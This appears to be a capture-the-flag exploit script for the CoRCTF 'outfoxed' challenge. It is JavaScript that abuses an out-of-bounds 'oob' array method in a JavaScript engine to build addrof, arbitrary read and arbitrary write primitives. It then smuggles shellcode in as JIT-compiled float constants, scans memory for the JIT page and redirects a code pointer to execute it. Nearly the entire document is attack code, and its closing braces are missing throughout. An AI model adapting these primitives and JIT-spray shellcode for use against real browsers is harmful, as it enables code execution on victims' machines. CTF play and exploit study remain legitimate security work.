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Created August 26, 2021 11:10
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CoRCTF - outfoxed
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
function f2i(f) {
f64[0] = f
return u32[0] + BASE*u32[1]
function i2f(i) {
u32[0] = i % BASE
u32[1] = i / BASE
return f64[0]
function hex(x) {
if (x < 0) return `-${hex(-x)}`
return `0x${x.toString(16)}`
function println(data) {
// navigator.sendBeacon("", data)
print("[*] "+data)
let arr1 = new Array(10)
let arr2 = new Uint32Array(10)
arr1[0] = 13.37
arr2[0] = 0x1234
// dumpObject(arr1)
// dumpObject(arr2)
const offset = 0x11
const arr2_addr = f2i(arr1.oob(offset)) - 0x38
println("arr2 @ "+hex(arr2_addr))
function read(addr){
arr1.oob(offset, i2f(addr));
u32[0] = arr2[0];
u32[1] = arr2[1];
return f2i(f64[0]);
function write(addr, value){
arr1.oob(offset, i2f(addr));
f64[0] = i2f(value);
arr2[0] = u32[0];
arr2[1] = u32[1];
function addrof(obj) {
arr1.oob(offset, i2f(arr2_addr + 0x38));
arr1.oob(offset + 1, obj);
u32[0] = arr2[0];
u32[1] = arr2[1] & 0xffff;
return f2i(f64[0]);
function read8f(addr){
arr1.oob(offset, i2f(addr));
u32[0] = arr2[0];
u32[1] = arr2[1];
return f64[0];
println("Testing primitives!");
const arr1_addr = addrof(arr1);
println("arr1 @ "+hex(arr1_addr))
println("value at array: "+hex(read(arr1_addr + 0x28)))
function func() {
const magic = 4.183559446463817e-216;
const a1 = 2.4877840611688293e-275;
const a2 = 2.4879820007592195e-275;
const a3 = 2.4879355641325583e-275;
const a4 = 2.5047751329248284e-275;
const a5 = 2.4881023834790942e-275;
const a6 = -6.828523606692364e-229;
for (i = 0; i < 100000; i++) {
func_addr = addrof(func)
shellcode_addr = read(func_addr + 0x28)
rx_page = read(shellcode_addr)
println("func @ "+hex(func_addr))
println("shellcode @ "+hex(shellcode_addr))
println("rx @ "+hex(rx_page))
f64[0] = i2f(rx_page);
u32[0] = u32[0] & 0xfffff000;
jit_addr = f2i(f64[0]);
println("jit page @ "+hex(jit_addr))
// arr1.brk()
while(read8f(jit_addr) != 4.183559446463817e-216 || read8f(jit_addr + 0xe) != 2.4877840611688293e-275) {
// println("searching @ "+hex(jit_addr)); //! Remove this print for the exploit to work
jit_addr = jit_addr + 1;
println("found shellcode @ "+hex(jit_addr));
jit_addr = jit_addr + 14;
write(shellcode_addr, jit_addr);
// arr1.brk()
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